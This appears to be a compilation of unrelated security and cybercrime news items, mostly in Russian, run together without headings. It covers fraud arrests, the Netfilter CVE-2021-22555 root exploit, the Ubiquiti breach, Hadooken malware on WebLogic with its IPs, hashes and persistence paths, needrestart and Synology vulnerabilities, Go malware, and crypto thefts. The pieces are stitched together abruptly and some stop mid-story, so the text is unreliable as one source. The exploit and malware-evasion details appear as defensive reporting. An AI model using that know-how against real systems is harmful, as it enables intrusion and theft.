Сотрудники подразделения по противодействию киберпреступности провели комплекс оперативных мероприятий в регионе. Так они вышли на 21-летнюю гомельчанку, которая в различных банках города оформила банковские платежные карты. По данным оперативников, девушка не планировала использовать карточки по назначению. В нарушение условий договора с банком передавала реквизиты, а также коды, подтверждающие авторизацию операций, 20-летнему знакомому горожанину. "Заполучив все необходимые сведения, парень использовал их для перевода, легализации и обналичивания денег, которые получал от преступных сделок. Девушка была в курсе незаконного заработка парня, однако этот момент ее не смущал, ведь и она получала небольшое вознаграждение", - рассказали в УВД.
Возбуждено уголовное дело по ч.1 ст.222 УК за изготовление в целях сбыта либо сбыт поддельных банковских платежных карточек, иных платежных инструментов и средств платежа, а равно совершенное из корыстных побуждений незаконное распространение реквизитов банковских платежных карточек либо аутентификационных данных, посредством которых возможно получение доступа к счетам либо электронным кошелькам. Еще 10 уголовных дел возбуждено по ч.2 ст.222 УК за те же действия, совершенные повторно, либо организованной группой, либо в особо крупном размере. Это уже тяжкое преступление.
В УВД отметили, что за эти деяния предусмотрено наказание до 6 лет лишения свободы. Те же действия, совершенные повторно, либо организованной группой, либо в особо крупном размере - до 10 лет лишения свободы.
В Netfilter, подсистеме ядра Linux, используемой для фильтрации и модификации сетевых пакетов, [выявлена](https://google.github.io/security- research/pocs/linux/cve-2021-22555/writeup.html) уязвимость ([CVE-2021-22555](https://security- tracker.debian.org/tracker/CVE-2021-22555)), позволяющая локальному пользователю получить привилегии root в системе, в том числе находясь в изолированном контейнере. Для тестирования [подготовлен рабочий прототип эксплоита](https://github.com/google/security- research/tree/master/pocs/linux/cve-2021-22555), обходящий механизмы защиты KASLR, SMAP и SMEP. Исследователь, выявивший уязвимость, получил от Google вознаграждение, размером 20 тысяч долларов, за выявление метода обхода изоляции контейнеров Kubernetes в кластере kCTF.
Проблема проявляется начиная с ядра 2.6.19, выпущенного 15 лет назад, и вызвана ошибкой в обработчиках IPT_SO_SET_REPLACE и IP6T_SO_SET_REPLACE, приводящей к переполнению буфера при отправке специально оформленных параметров через вызов setsockopt в режиме compat. В обычных условиях вызов compat_setsockopt() может выполнить только пользователь root, но необходимые для совершения атаки полномочия также могут быть получены непривилегированным пользователем в системах с включённой поддержкой пространств имён идентификаторов пользователей (user namespaces).
Пользователь может создать контейнер с отдельным пользователем root и из него эксплуатировать уязвимость. Например, "user namespaces" по умолчанию включён в Ubuntu и Fedora, но не активирован в Debian и RHEL. Патч с исправлением уязвимости принят в состав ядра Linux 13 апреля. Обновления пакетов уже сформированы проектами Debian, Arch Linux и Fedora. В Ubuntu, RHEL и SUSE обновления на стадии подготовки.
Проблема возникает в функции xt_compat_target_from_user() из-за некорректного расчёта размера памяти при сохранении структур ядра после преобразования из 32- в 64-разрядное представление. Ошибка позволяет записать четыре нулевых байта в любую позицию за границей выделенного буфера, ограниченную смещением 0x4C. Указанной возможности оказалось достаточно для создания эксплоита, позволяющего добиться получения прав root - через очистку указателя m_list->next в структуре msg_msg создавались условия для обращения к данным после освобождения памяти (use-after-free), что затем использовалось для получения сведений об адресах и изменения других структур через манипуляцию с системным вызовом msgsnd().
A whistleblower said the company downplayed a “catastrophic” incident.
Saturday, April 03, 2021
Ubiquiti, an organization whose prosumer-grade routers have gotten synonymous
with security and manageability is being blamed for concealing a
“catastrophic” security breach — and following 24 hours of silence, the
organization has now given a statement that doesn't deny any of the whistle-
blower’s claims.
In January, the creator of routers, Internet-connected cameras, and other networked gadgets, revealed what it said was “unauthorized access to certain of our information technology systems hosted by a third-party cloud provider.” The notification said that, while there was no proof the intruders accessed client information, the organization couldn't preclude the likelihood that they got clients' names, email addresses, cryptographically hashed passwords, addresses, and telephone numbers. Ubiquiti suggested clients to change their passwords and enable two-factor authentication.
Initially, Ubiquiti emailed its clients about a supposedly minor security breach at a “third-party cloud provider” on January 11th but found out that the cybersecurity news site KrebsOnSecurity is reporting that the breach was far more awful than Ubiquiti let on. A whistle-blower from the organization who spoke to Krebs guaranteed that Ubiquiti itself was breached and that the organization's legal team forestalled efforts to precisely report the dangers to customers.
The breach comes as Ubiquiti is pushing—if not outright requiring—cloud-based accounts for clients to set up and regulate gadgets running newer firmware renditions. An article says that during the underlying setup of an UniFi Dream Machine (a popular router and home gateway appliance), clients will be incited to sign in to their cloud-based account or, on the off chance that they don't have one, to make an account.
Brian Krebs of KrebsOnSecurity wrote, "In reality, Adam (the fictitious name that Brian Krebs of KrebsOnSecurity gave the whistleblower) said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there."
“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.
[https://www.ehackingnews.com/2021/04/ubiquiti-has-been-covering-up- data.html](https://www.ehackingnews.com/2021/04/ubiquiti-has-been-covering- up-data.html)
An update released last week by Mozilla for Firefox 85 patches a critical information disclosure vulnerability that can be chained with other security flaws to achieve arbitrary code execution.
Полиция префектуры Айти (Япония) арестовала четырех подозреваемых в организации криптомошеннического проекта Oz Project, жертвами которого стали более 20 000 граждан c ущербом на сумму до 6 млрд иен (~$54,3 млн). Об этом пишет Asahi Shimbun Digital.
Создатели преступной схемы предлагали алгоритмическую торговлю на базе искусственного интеллекта от имени пользователей на платформе проекта.
Седзи Ишида, Юкихиро Ямасита, Такуя Хасияда и Масамичи Тосима обещали увеличение первоначальной суммы в 2,5 раза в течение четырехмесячного периода. Они рассчитывали на привлечение друзей и знакомых участников проекта.
Обманутые инвесторы подали гражданские иски в Нагою и Токио, требуя возмещения убытков.
• Source: https://www.asahi.com/articles/ASP7D3CQMP7DOIPE003.html
В ходе операции иммиграционной полиции Таиланда арестован гражданин России, предполагаемый лидер международной преступной группировки, занимавшейся подделкой и продажей паспортов 15 различных стран, включая США. Как сообщает тайское издание «Кхаосод», ущерб от деятельности группировки оценивается более чем в 30 миллионов батов.
10 июля 2024 года представители Иммиграционного бюро Таиланда официально объявили о задержании 44-летнего россиянина по имени Артем. Подозреваемого арестовали на основании ордера, выданного Южным уголовным судом Бангкока 26 июня 2024 года. Гражданину России предъявлены обвинения в изготовлении и продаже поддельных паспортов, а также в ввозе поддельных паспортов на территорию Таиланда.
Заместитель комиссара Иммиграционного бюро, генерал-майор полиции Пантана Нучанарт, сообщил, что арест произведен в квартире жилого комплекса на улице Наратхиват Ратчанакарин в районе Банграк, Бангкок.
Расследование, проведенное Иммиграционным бюро, выявило, что преступная сеть ввозила и продавала поддельные паспорта в Таиланде. Первоначально внимание следователей привлекли фотографии страниц предположительно американских паспортов. Детальное изучение фотографий выявило ряд подозрительных аномалий, что позволило предположить поддельность документов. Информацию о подделке подтвердил Отдел зарубежных уголовных расследований в Таиланде.
Дальнейшее расследование показало, что преступная сеть открыто рекламировала свои услуги через популярные приложения, такие как VK, Telegram и WhatsApp, а также через веб-сайты. Преступники утверждали, что могут изготовить паспорта 15 различных национальностей, представляя это как законный процесс получения гражданства. Оплата производилась через счета цифровых валют, а для повышения доверия была даже создана компания в Таиланде.
Интересно отметить, что использование криптовалют для оплаты нелегальных услуг становится все более распространенным явлением в преступном мире, так как это затрудняет отслеживание финансовых потоков правоохранительными органами.
Также полиция обнаружила, что многие жертвы были обмануты. Некоторые из них вообще не получили паспорта, в то время как другим были отправлены поддельные документы через службу FedEx из Доминиканской Республики.
В ходе совместного расследования с Отделом по расследованию транснациональных преступлений США было установлено, что лидером группы является Артем, что и привело к его аресту. При задержании были изъяты вещественные доказательства, включая мобильные телефоны, ноутбуки, банковские книжки и иностранные кредитные карты.
Дальнейшее расследование выявило, что в преступной сети существовало четкое разделение обязанностей. В Доминиканской Республике находились лица, получавшие заказы на изготовление поддельных паспортов от Артема. Они же отвечали за рекламу, общение с жертвами и управление полученными от них денежными средствами.
Эксперты отмечают, что подобные транснациональные преступные группировки становятся все более изощренными в своих методах. Использование современных технологий, таких как криптовалюты и защищенные мессенджеры, значительно усложняет работу правоохранительных органов.
Власти Таиланда призывают граждан быть бдительными и сообщать о любых подозрительных предложениях, связанных с получением паспортов или гражданства. Расследование продолжается, и не исключено, что в ближайшее время могут последовать новые аресты лиц, связанных с этой преступной группой.
Oracle WebLogic Server — это сервер приложений, предназначенный для
разработки, развертывания и управления корпоративными приложениями на основе
стандартов Java EE и Jakarta EE. Он является ключевым компонентом Oracle
Fusion Middleware, обеспечивая надёжную и масштабируемую среду.
Исследователи из Aqua Nautilus недавно обнаружили новое вредоносное ПО для Linux под названием Hadooken , которое активно использует уязвимости серверов Oracle WebLogic.
Вредоносное ПО Hadooken нацелено на серверы Oracle WebLogiс и использует слабые учетные данные администратора для получения первоначального доступа.
Hadooken развёртывает два ключевых компонента:
Атака использует скрипты на Shell («c») и Python («y»), чтобы загружать и
запускать полезные нагрузки, предпочитая нестойкие директории, такие как
/tmp.
Криптомайнер устанавливается в виде файлов:
- /usr/bin/crondr
- /usr/bin/bprofr
- /mnt/-java
Малварь Tsunami использует случайное имя файла в директории /tmp.
Устойчивость достигается через задания cron, создаваемые в
/etc/cron.
Для бокового перемещения малварь ищет SSH-данные в различных директориях. Она
применяет техники уклонения, включая кодирование в base64, очистку логов и
маскировку процессов.
Связанные IP-адреса 89.185.85.102 и 185.174.136.204 могут быть связаны с распределением программ-вымогателей, таких как Mallox (MD5: 4a12098c3799ce17d6d59df86ed1a5b6), RHOMBUS и NoEscape. Дополнительно, найден скрипт PowerShell b.ps1 (MD5: c1897ea9457343bd8e73f98a1d85a38f), который распространяет вымогатель Mallox, что свидетельствует о многоплатформенной стратегии атаки.
Кроме того, данные Shodan показывают, что более 230 тысяч серверов WebLogic подключены к интернету, из которых несколько сотен имеют уязвимые администраторские консоли, подлежащие эксплуатации.
Ниже представлен фреймворк MITRE ATT &CK:
[Источник](https://www.aquasec.com/blog/hadooken-malware-targets-weblogic- applications/)
Сотрудниками Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержаны двое молодых людей, которые подозреваются в неправомерном доступе к компьютерной информации.
«По имеющимся данным, злоумышленники приобретали неактивные сим-карты различных операторов связи. С помощью специальных программ абонентские номера проверялись на наличие ранее зарегистрированных аккаунтов на платформе «Госуслуг». Сообщники получали доступ к персональным данным граждан и оформляли на них займы, после чего выводили полученные денежные средства на счета посредников – так называемых «дропов».
Следователем СУ УМВД России по Гатчинскому району Ленинградской области возбуждены уголовные дела по признакам преступления, предусмотренного статьей 272 УК РФ», – сообщила официальный представитель МВД России Ирина Волк.
В ходе обысков по адресам проживания задержанных изъяты мобильные телефоны, банковские и сим-карты, а также другие предметы, имеющие доказательственное значение. Кроме того, обнаружена база данных, содержащая сведения о гражданах, учетные записи которых были скомпрометированы.
«В отношении двоих фигурантов избрана мера пресечения в виде подписки о невыезде и надлежащем поведении. Предварительное расследование продолжается», – добавила Ирина Волк.
• Video: https://rutube.ru/video/ff9810e54285a1da263ccc517324d921/?r=plemwd
В утилите needrestart, используемой в Ubuntu с версии 21.04 и представленной более 10 лет назад, выявлены сразу пять уязвимостей, связанных с локальным повышением привилегий. Баги позволяют локальному злоумышленнику получить привилегии root без необходимости взаимодействия с пользователем.
Needrestart – популярная утилита, широко использующаяся в Linux, в том числе в Ubuntu Server, для определения сервисов, которым требуется перезапуск после обновления пакетов.
Проблемы были обнаружены специалистами [Qualys](https://blog.qualys.com/vulnerabilities-threat- research/2024/11/19/qualys-tru-uncovers-five-local-privilege-escalation- vulnerabilities-in-needrestart) и получили идентификаторы: CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224 и CVE-2024-11003. Все уязвимости появились еще в коде needrestart версии 0.8, выпущенной в апреле 2014 года, и были исправлены только на этой неделе, с релизом версии 3.8.
Детальная информация о найденных проблемах доступна в отдельном текстовом файле, а их краткое описание можно увидеть ниже.
Подчеркивается, что для эксплуатации этих уязвимостей злоумышленник должен иметь локальный доступ к системе, полученный ранее (например, с помощью вредоносного ПО или взломанной учетной записи).
Исследователи предупреждают, что учитывая широкое распространение needrestart и длительное время существования уязвимостей, эти недостатки могут применяться для повышения привилегий в критически важных системах.
Помимо обновления до версии 3.8 или более поздней, которая уже содержит патчи,
рекомендуется изменить файл needrestart.conf, чтобы отключить функцию
сканирования интерпретаторов, что предотвращает эксплуатацию багов:
$nrconf{interpscan} = 0
.
Уязвимость, отнесенная к категории «критических», в приложении для работы с фотографиями, установленном по умолчанию на сетевых устройствах хранения данных Synology, может дать злоумышленникам возможность красть данные и даже хуже.
Популярное устройство и приложение, используемое миллионами частных лиц и компаний по всему миру для хранения документов, уязвимо к дефекту «нулевого клика», обнаружила группа голландских исследователей.
Уязвимость, которую называют «нулевым кликом», потому что для заражения не нужно ничего нажимать, затрагивает фотоприложение, установленное по умолчанию на популярных сетевых устройствах хранения данных (NAS) тайваньской компании Synology. Ошибка позволяет злоумышленникам получить доступ к устройствам, чтобы украсть личные и корпоративные файлы, установить черный ход или заразить систему программой-выкупом, не позволяющей пользователям получить доступ к своим данным.
Пакет приложений SynologyPhotos предустановлен и включен по умолчанию на линейке устройств хранения данных BeeStation компании Synology, а также является популярным приложением, загружаемым пользователями систем хранения данных DiskStation, которые позволяют увеличить объем памяти за счет съемных компонентов. В последние годы, начиная как минимум с 2019 года, несколько групп, занимающихся вымогательством, атаковали сетевые устройства хранения данных производства Synology и других компаний. В начале этого года пользователи систем DiskStation от Synology сообщили о том, что они стали жертвами программ-вымогателей.
Рик де Ягер, исследователь безопасности из нидерландской компании Midnight Blue, обнаружил уязвимость за два часа в рамках хакерского конкурса Pwn2Own в Ирландии. Он и его коллеги Карло Мейер, Воутер Бокслаг и Йос Ветцельс провели сканирование подключенных к Интернету устройств и обнаружили сотни тысяч сетевых хранилищ Synology, подключенных к сети, которые уязвимы для атаки. Однако исследователи утверждают, что потенциально уязвимыми и доступными для атаки являются миллионы других устройств.
Вместе с организаторами Pwn2Own они уведомили Synology об уязвимости на прошлой неделе.
Сетевые системы хранения данных считаются ценными целями для операторов вымогательского ПО, поскольку хранят большие объемы данных. Многие пользователи подключают их напрямую к Интернету из собственных сетей или используют облачные хранилища Synology для резервного копирования данных на эти системы в режиме онлайн. Исследователи рассказали WIRED, что хотя системы могут быть настроены с помощью шлюза, который требует учетных данных для доступа к ним, часть фотоприложения, содержащая уязвимость нулевого клика, не требует аутентификации, поэтому злоумышленники могут использовать уязвимость непосредственно через интернет, минуя шлюз. Уязвимость дает им root-доступ для установки и выполнения любого вредоносного кода на устройстве.
Исследователи также отметили, что приложение для работы с фотографиями, которое помогает пользователям упорядочивать снимки, обеспечивает легкий доступ независимо от того, подключают ли пользователи свое NAS-устройство непосредственно к Интернету или через сервис QuickConnect компании Synology, который позволяет пользователям получать удаленный доступ к NAS из любого места. А если злоумышленники найдут один NAS Synology, подключенный к облаку, они смогут легко обнаружить и другие благодаря способу регистрации систем и присвоения им идентификаторов.
«Многие устройства подключены к частному облаку через сервис QuickConnect, и они тоже могут быть использованы, так что даже если вы не подключаете их напрямую к Интернету, вы можете использовать их через этот сервис, а это миллионы устройств», - говорит Ветцельс.
Исследователям удалось обнаружить подключенные к облаку NAS Synology, принадлежащие полицейским департаментам в США и Франции, а также большому количеству юридических фирм в США, Канаде и Франции, операторам грузовых перевозок и нефтяных резервуаров в Австралии и Южной Корее. Они даже нашли компьютеры, принадлежащие подрядчикам по техническому обслуживанию в Южной Корее, Италии и Канаде, которые работают на электросетях, в фармацевтической и химической промышленности.
«Это фирмы, которые хранят корпоративные данные... управленческие документы, инженерную документацию, а в случае с юридическими фирмами, возможно, и материалы дел», - отмечает Ветцельс.
По словам исследователей, выкупные программы и кража данных - не единственная проблема этих устройств: злоумышленники также могут превратить зараженные системы в ботнет для обслуживания и сокрытия других хакерских операций, как, например, массивный ботнет Volt Typhoon, который хакеры из Китая создали из зараженных домашних и офисных маршрутизаторов для сокрытия своих шпионских операций.
Synology не ответила на просьбу о комментарии, но 25 октября на сайте компании появились два предупреждения о безопасности, связанные с этой проблемой, в которых уязвимость названа «критической». В этих рекомендациях, подтверждающих, что уязвимость была обнаружена в рамках конкурса Pwn2Own, указано, что компания выпустила исправления для этой уязвимости. Однако NAS- устройства Synology не имеют возможности автоматического обновления, поэтому неясно, сколько клиентов знают о патче и применили его. Выпущенный патч также облегчает задачу злоумышленникам, которые теперь могут узнать об уязвимости из патча и разработать эксплойт для целевых устройств.
«Найти [уязвимость] самостоятельно, независимо, - говорит Мейджер в интервью WIRED, - не так уж и просто, но когда патч уже выпущен и вы занимаетесь его реверс-инжинирингом, выяснить и соединить все точки довольно легко».
source: https://www.wired.com/story/synology-zero-click-vulnerability/
Министерство юстиции США предъявило братьям Антону и Джеймсу Перейро-Буэно ( Anton Peraire-Bueno and James Pepaire-Bueno ) обвинение в сговоре с целью мошенничества с использованием электронных средств, мошенничестве с использованием электронных средств и сговоре с целью отмывания денег.
Согласно обвинению, братья, изучавшие информатику и математику в одном из самых престижных университетов мира, использовали навыки, полученные во время обучения, а также свой опыт в торговле криптовалютами, чтобы манипулировать протоколами, с помощью которых транзакции проверяются и добавляются в блокчейн Эфириума.
Обвиняемые обманным путем получили доступ к ожидающим частным транзакциям и использовали его для изменения определенных транзакций и получения криптовалюты своих жертв. Братья планировали эксплойт в течение нескольких месяцев, после чего украли $25 млн всего за двенадцать секунд.
Власти США заявили, что братья отклонили запросы о возврате украденных средств и спрятали активы, используя подставные компании и иностранные криптобиржи, переведя их на несколько кошельков. В случае признания виновными им грозит до двадцати лет тюремного заключения.
Ранее команда протокола криптокредитования Sonne Finance объявила, что потеряла как минимум $20 млн, поскольку злоумышленник смог воспользоваться уязвимостью в некоторых смарт-контрактах.
justice[.]gov/opa/pr/two-brothers-arrested-attacking-ethereum-blockchain-and- stealing-25m-cryptocurrency
В Москве «сотрудники соцзащиты» заскамили пенсионерку на 3,4 млн рублей.
Всё началось со звонка на домашний телефон 84-летней Эльвиры Сергеевны. Незнакомая женщина бодро представилась сотрудницей соцзащиты и предупредила, что скоро к пенсионерке заглянет соцработница. У неё было важное дело: забрать все купюры по 5 тысяч рублей и заодно доллары — потому что в России они больше не нужны и Центробанк выводит эти деньги из оборота. Вместо них Эльвире Сергеевна пообещали дать новые купюры.
Пенсионерка с ЦБ спорить никак не могла, поэтому она достала из серванта накопленную заначку из рублей и долларов (всего 3,4 млн руб) и дождалась соцработницу. Та была немногословной: женщина представилась Людмилой Ивановной, обменяла «устаревшие» купюры и ушла в небытие.
В Японии домашние рыбки получили доступ к учетной записи своего владельца в интернет-магазине Nintendo Switch и пополнили её баланс с кредитной карты. «Киберпреступление» было совершено прямо во время трансляции на YouTube. Сотни зрителей наблюдали, как маленькие рыбки «украли личность» своего владельца, пока того не было рядом.
Всё началось с того, что владелец YouTube канала «Mutekimaru Channel» решил провести эксперимент. Ему стало интересно, смогут ли его домашние рыбки самостоятельно пройти игры серии Pokémon на Nintendo Switch. Для этого японский ютубер установил веб-камеру и направил её на аквариум. Специальное программное обеспечение для отслеживания движения следило за рыбками, когда они плавали по наложенной сетке, соответствующей клавишам контроллера. Если какая-то рыбка останавливалась в одной из ячеек, это действие фиксировалось и передавалось на консоль.
Автор канала уже проводил подобный эксперимент раньше. В 2020 году его рыбки успешно прошли Pokémon Sapphire за 3195 часов, в то время, как человек справился бы с этим примерно за полчаса.
В этот раз всё пошло не совсем по плану. «Кража личности» произошла, когда владельца «киберпреступников» не было дома. Игра шла гладко, рыбки уже выиграли несколько битв, но на отметке в 1144 часа — игра вылетела. А так как ютубера не было рядом, исправить ситуацию было некому. Система продолжала регистрировать команды от рыбок уже вне игры.
В процессе «злоумышленники» открыли Nintendo eShop и добавили на баланс профиля 500 иен (~270 руб). Более того, рыбки также раскрыли информацию кредитной карты владельца всем зрителям стрима.
Затем рыбкам удалось использовать часть накопленных ютубером призовых баллов, чтобы купить новую аватарку профиля, загрузить эмулятор Nintendo64 и изменить имя учетной записи с «Mutekimaru» на «ROWAWAWAWA¥».
Вакханалия продолжалась около семи часов, прежде чем хозяин рыбок наконец-то вернулся домой и отключил контроллер. «Жертва» мошенничества связалась с Nintendo и объяснила, что произошло, попросив возместить свои 500 иен. Как ни странно, Nintendo удовлетворила просьбу.
По итогу, ютубер лишился только 10 баллов за покупку аватара профиля и данных своей карты. Вероятно, карта уже была перевыпущена, чтобы никто не смог воспользоваться ею. Остаётся надеяться, что герой этой истории не держит зла на своих питомцев.
Исследователи представили коллизию встроенной в iOS хэш-функции, что повышает недоверие пользователей к новой системе сканирования CSAM от компании Apple. Однако сама Apple утверждает, что опасаться нечего, и открытие исследователей никак не угрожает целостности системы.
Проблема затрагивает алгоритм хэширования NeuralHash, позволяющий Apple проверять контент пользователей на наличие изображений детской порнографии, совпадающих с изображениями из баз данных Национального центра пропавших без вести и эксплуатируемых детей (National Center for Missing & Exploited Children, NCMEC). При этом к фотографиям, отсутствующим в базах данных, а также к другой информации пользователей у компании доступа не будет.
Ранее на этой неделе пользователь GitHub Асухариет Игвар (Asuhariet Ygvar) опубликовал код реконструированной Python-версии NeuralHash. По словам пользователя, он осуществил реверс-инжиниринг алгоритма из предыдущих версий iOS. Помимо кода также были опубликованы инструкции по извлечению файлов NeuralMatch из текущих сборок macOS и iOS. Получившийся алгоритм представляет собой, скорее, базовую версию NeuralHash, чем отдельный алгоритм, однако он все равно дает общее представление о сильных и слабых сторонах NeuralHash.
Как показало первое тестирование, алгоритм «видит» изображения с измененным размером или сжатые изображения, но не «видит» обрезанные или перевернутые.
Вскоре после публикации Игвара пользователю Кори Корнеулиусу (Cory Cornelius) удалось осуществить коллизию в алгоритме – создать два изображения с одним и тем же хэшем. Это серьезная проблема, но Apple уверяет, что дополнительные механизмы защиты в системе CSAM заблокируют возможность ее эксплуатации.
Как уверяют в компании, ее система CSAM была изначально создана с учетом коллизий и известных ограничений в перцептивных алгоритмах хэширования. В частности, Apple отметила вторичный алгоритм хеширования на стороне сервера, отдельный от NeuralHash, подробности о котором не разглашаются.
Даже без дополнительной проверки для использования коллизий на практике потребовались бы чрезвычайные усилия. Как правило, коллизионные атаки позволяют исследователям находить идентичные входные данные, которые производят один и тот же хэш. В случае с CSAM это означает создание изображения, запускающего предупреждения, даже если это изображение отсутствует в базах данных, поскольку оно создает тот же хэш, что и изображение в базе данных. Однако для генерации предупреждения потребуется доступ к базе данных хэшей Национального центра пропавших без вести и эксплуатируемых детей (National Center for Missing & Exploited Children, NCMEC), создание более 30 коллидирующих изображений, а затем передача их на телефон жертвы. Даже в этом случае будут генерироваться предупреждения только для Apple и NCMEC, которые легко смогут идентифицировать их как ложные срабатывания.
Коллизионные PoC-атаки всегда представляют большую угрозу криптографическим хэшам, как в случае с коллизией SHA-1, осуществленной в 2017 году, однако перцепционные хэши наподобие NeuralHash считаются более устойчивыми к таким атакам. Хотя ожидается, что Apple внесет некоторые изменения в алгоритм NeuralMatch, в настоящее время присутствующий в iOS, в общих чертах система CSAM останется в том же виде.
Эксперты компании Intezer сообщают, что с 2017 года количество вредоносных программ, написанных на языке Go, увеличилось на 2000%, и в настоящее время такая малварь уже стала обычным явлением. Golang часто используют «правительственные» хакеры, злоумышленники более низкого уровня, а также специалисты по информационной безопасности (обычно для создания пентестерских инструментов).
Ранее специалисты уже отмечали, что в последние годы злоумышленники постепенно отошли от использования C и C ++, все чаще отдавая предпочтение Go, языку программирования, разработанному и запущенному Google в 2007 году. Хотя первый вредонос на Go появился еще в 2012 году, языку потребовалось время, чтобы завоевать такую популярность.
В своем отчете Intezer объясняет, что у этой популярности есть три основных причины. Первая из них, это простота кроссплатформенной компиляции, позволяющая разработчикам малвари один раз написать код, а затем сразу компилировать бинарники для разных платформ, включая Windows, Mac и Linux.
Вторая причина заключается в том, что бинарники на основе Go по-прежнему весьма сложно анализировать и реверсить, что позволяет хакерам поддерживать низкие уровни обнаружения для своей малвари.
Третья причина связана с тем, как в Go реализована поддержка работы с сетевыми пакетами и запросами:
«Go имеет хорошо написанный сетевой стек, с которым легко работать. Go стал одним из облачных языков программирования, на котором написано множество нативных облачных приложений. Например, Docker, Kubernetes, InfluxDB, Traefik, Terraform, CockroachDB, Prometheus и Consul — все они написаны на Go. Это имеет смысл, учитывая, что одной из причин создания Go было изобретение лучшего языка, который можно было бы использовать для замены внутренних сетевых служб C ++, используемых Google», — говорят исследователи.
Многие из написанных на Go вредоносов – это ботнеты, нацеленные на IoT- устройства и Linux, целью которых является либо установка криптовалютных майнеров, либо использование зараженных устройств для DDoS-атак. Кроме того, эксперты пишут, что все больше становится вымогателей, тоже написанных на языке Go.
В 2020 году Go-угроз было много, исследователи перечисляют лишь наиболее распространенные и заметные из них:
Zebrocy— русскоязычная хак-группа APT28 создала версию малвари Zebrocy на базе Go;
WellMess— русскоязычная хак-группа APT29 развернула обновленные версии малвари WellMess на базе Go;
Godlike12— китайские хакеры использовали бэкдоры на основе Go для атак на тибетское сообщество;
Go Loader— китайская Mustang Panda APT развернула новый загрузчик на базе Go.
GOSH — известная хак-группа Carbanak использовала новый RAT GOSH, написанный на Go в августе прошлого года;
Glupteba— появились новые версии загрузчика Glupteba;
новый RAT, нацеленный на Linux-серверы под управлением Oracle WebLogic, был замечен Bitdefender;
Go— обнаружены улучшенные версии малвари CryptoStealer.Go, предназначенной для кражи криптовалютных кошельков и паролей браузеров.
Существует целая отрасль, представители которой специализируются на раскрытии личности анонимных пользователей.
Технологические компании неоднократно заверяли общественность, что трекеры,
используемые для отслеживания пользователей смартфонов через приложения,
являются анонимными, не идентифицируя напрямую человека, использующего
мобильное устройство. Но они не упоминают, что существует целая отрасль,
представители которой специализируются на раскрытии личности анонимных
пользователей.
Как сообщило издание Motherboard, компании в данной отрасли связывают
собранные приложениями идентификаторы мобильной рекламы (mobile advertising
ID, MAID) с полным именем, физическим адресом и другой личной идентифицируемой
информацией пользователя. MAID представляет собой уникальный идентификатор,
который операционная система телефона присваивает индивидуальному устройству
пользователя. Для Apple это IDFA, а для Google — AAID или рекламный
идентификатор Android. Приложения часто получают MAID пользователя и
предоставляют его третьим лицам.
Индустрия деанонимизации использует различные термины для описания своего
продукта, включая «разрешение идентичности» и «диаграмма идентичности».
Например, подобные услуги предоставляет технологическая компания FullContact,
владеющая 223 млрд сведений о пользователях в США, а также информацией о
профилях более чем 275 млн взрослых в США.
«Наша персональная идентификационная карта предоставляет как личные, так и
профессиональные сведения о человеке, а также online- и offline-
идентификаторы. MAID были созданы для маркетингового и рекламного сообщества и
привязаны к отдельному мобильному устройству, что позволяет с их помощью точно
идентифицировать конкретных людей», — говорится в маркетинговых материалах
FullContact.
FullContact не ответила изданию Motherboard, собираются ли MAID и
идентифицирующая информация с согласия пользователей, и какие меры защиты
использует FullContact для предотвращения злоупотребление своей способностью
разоблачать людей.
Представители компании BIGDBM, также предоставляющей услуги по идентификации
людей, утверждают, что у них есть одно из крупнейших хранилищ текущих свежих
данных MAIDS, связанных с идентифицируемой информацией пользователей в США.
Как сообщается, MAIDS компании BIGDBM позволяют идентифицировать полное имя,
физический адрес и номера телефонов, адреса электронной почты и IP-адреса
пользователей.
По словам экспертов, существование компаний, которые явно связывают MAID с
личной информацией, может вызвать проблемы в соответствии с законодательством
США о конфиденциальности.
Bazar (which has been classified as the Team9 malware family being developed by the group behind Trickbot) is a backdoor Trojan designed to target a device, collect sensitive information, control the system via commands, and deliver malware. Last year, it was observed delivering the [TrickBot](https://www.fortinet.com/blog/threat-research/new-variant-of- trickbot-being-spread-by-word- document?utm_source=blog&utm_campaign=2020-q1-new-variant-of-trickbot-being- spread-by-word-document) malware.
FortiGuard Labs recently noticed a suspicious email through the SPAM monitoring system. This email was designed to entice a victim into opening a web page to download an executable file. Additional research on this executable file found that it is a new variant of Bazar. In this post you can expect to learn what new techniques this Bazar uses to perform anti-analysis, how it communicates with its C2 server, what sensitive data it is able to collect from the victim's device and how it is able to deliver other malware onto the victim's system.
Как сообщили аналитики платформы CertiK, неизвестный крупный холдер потерял $55,4 млн в стейблкоинах DAI после фишинговой атаки. Мошенник применил сервис Inferno Drainer для получения доступа к его внешней учётной записи (EOA).
Потом хакер задействовал EOA для доступа к хранилищу Maker, которое позволяет выпускать стейблкоины DAI, используя другие криптоактивы в качестве залога. Злоумышленник без труда поменял адрес владельца хранилища на свой и вывел стейблкоины.
Эксперты Blockchain Lookonchain отметили, что злоумышленник обменял 27,5 миллионов стейблкоинов на 10625 эфиров (ETH). В компании рекомендовали пользователям воздерживаться от подписания неизвестных транзакций и всегда дважды проверять всё, что требует подписи.
В первой половине 2024 года фишинговые атаки привели к убыткам почти в полмиллиарда долларов. Соучредитель CertiK Жунху Гу подчеркнул необходимость использования таких методов многофакторной аутентификации, как двухфакторная аутентификация (2FA) и ключи безопасности.
Однако, несмотря на все предостережения, трейдеры и инвесторы всё равно теряют сотни тысяч и миллионы долларов из-за фишинговых атак. Теперь их очередной жертвой стал и этот трейдер, потерявший более $55 млн.
Протокол Loopring, построенный на базе решения масштабирования для сети Эфириума ZK-Rollups, подвергся взлому через компрометацию службы восстановления кошелька Guardian.
Команда разработчиков Loopring Wallet позиционировала свое приложение как «самый безопасный кошелек Эфириума». В его основу была заложена технология второго уровня ZK-Rollups, которая поддерживает быстрые и дешевые транзакции с применением доказательств с нулевым разглашением, а также служба двухфакторной аутентификации Guardian.
Однако, как стало известно в воскресенье, протокол Loopring подвергся взлому, связанному с нарушениями безопасности службы двухфакторной аутентификации Guardian. С помощью Guardian пользователи могли присвоить специальные права кошелькам доверенных лиц или учреждений, чтобы заблокировать скомпрометированный кошелек Loopring или восстановить к нему доступ в случае потери исходной фразы.
